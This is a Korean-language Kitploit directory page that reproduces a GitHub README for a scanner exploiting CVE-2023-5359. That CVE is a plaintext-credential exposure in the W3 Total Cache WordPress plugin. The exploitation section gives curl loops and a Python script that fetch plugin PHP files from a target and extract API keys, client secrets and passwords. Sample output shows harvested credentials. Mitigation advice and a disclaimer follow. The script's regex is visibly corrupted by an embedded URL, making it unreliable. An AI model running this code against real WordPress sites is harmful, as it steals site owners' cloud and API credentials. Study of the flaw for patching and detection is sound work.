Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/enzocipher/cve-2023-5359
Vulnerability ScannersPassword AttacksExploitationInformation GatheringWeb SecurityLearning & Education
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - W3 Total Cache 평문 저장 취약점 스캐너. W3 Total Cache 플러그인 버전 ≤ 2.7.5에서 노출된 자격 증명을 탐지합니다.

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-5359 - W3 Total Cache 평문 저장 취약점

설명

CVE-2023-5359는 WordPress 플러그인 W3 Total Cache 버전 ≤ 2.7.5에 영향을 미치는 평문 저장 취약점입니다. 이 취약점으로 인해 원격 공격자는 공개적으로 접근 가능한 암호화되지 않은 PHP 파일에 저장된 민감한 자격 증명에 접근할 수 있습니다.

심각도

  • CVSS 점수: 7.5 (높음)
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • 유형: 민감 정보 노출

기술적 취약점

근본 원인

W3 Total Cache는 /wp-content/plugins/w3-total-cache/ 디렉토리 내의 PHP 파일에 구성 설정과 API 자격 증명을 적절한 보호 없이 저장합니다. 이러한 파일은 HTTP를 통해 접근 가능하므로 다음이 노출됩니다:

  • API 키 (CloudFlare, Google 등)
  • 클라이언트 시크릿
  • OAuth 토큰
  • 외부 서비스 자격 증명

영향받는 파일

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

악용

수동 방법

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

자동화 스크립트

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

영향

공격자는 다음을 얻을 수 있습니다:

  1. CloudFlare 자격 증명 - CDN 및 DNS 제어
  2. 외부 서비스용 API 키 - 외부 계정 접근
  3. OAuth 토큰 - 신원 사칭
  4. 캐시 구성 - 제공되는 콘텐츠 조작

완화 대책

즉시 조치

  1. W3 Total Cache ≥ 2.7.6으로 업데이트
  2. 플러그인 디렉토리의 PHP 파일에 대한 접근 제한
  3. 노출된 모든 자격 증명 폐기 및 재생성

보안 구성

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

탐지

검증 명령

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

침해 지표

  • 외부 API의 비정상적인 활동
  • CloudFlare 구성 변경
  • 연결된 서비스로 접근하는 승인되지 않은 IP의 트래픽

예시 결과

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

참조

  • CVE-2023-5359
  • W3 Total Cache 변경 로그
  • WordPress 보안 팀

법적 고지

이 저장소는 교육 목적 및 승인된 침투 테스트 전용입니다. 이 정보의 악의적인 사용은 엄격히 금지됩니다.


이 정보가 유용했나요? 저장소에 Star를 남겨주세요!

최종 업데이트: 2025년 11월

도구 다운로드